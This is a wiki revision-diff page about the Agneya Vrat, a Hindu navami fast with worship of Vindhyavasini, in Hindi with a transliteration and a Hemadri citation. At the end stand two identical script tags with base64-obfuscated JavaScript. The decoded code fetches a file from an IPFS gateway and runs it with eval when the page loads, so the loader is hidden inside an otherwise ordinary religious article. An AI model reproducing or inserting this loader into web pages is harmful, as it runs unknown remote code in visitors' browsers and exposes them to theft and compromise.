Difference between revisions of "आग्नेय व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - "उल्लखित" to "उल्लिखित")
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*यह व्रत किसी भी [[नवमी]] को एक बार किया जाना चाहिए।
 
*यह व्रत किसी भी [[नवमी]] को एक बार किया जाना चाहिए।
 
*आग्नेयव्रत में पुष्पों (पाँच उपचारों) के साथ [[विन्ध्यवासिनी]] की पूजा करनी चाहिए।<ref>हेमाद्रि (व्रतखण्ड 1, 958-59, भविष्योत्तर का उद्धरण है)।</ref>
 
*आग्नेयव्रत में पुष्पों (पाँच उपचारों) के साथ [[विन्ध्यवासिनी]] की पूजा करनी चाहिए।<ref>हेमाद्रि (व्रतखण्ड 1, 958-59, भविष्योत्तर का उद्धरण है)।</ref>

Revision as of 16:24, 25 February 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat kisi bhi navami ko ek bar kiya jana chahie.
  • agneyavrat mean pushpoan (paanch upacharoan) ke sath vindhyavasini ki pooja karani chahie.[1]


tika tippani aur sandarbh

  1. hemadri (vratakhand 1, 958-59, bhavishyottar ka uddharan hai).

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>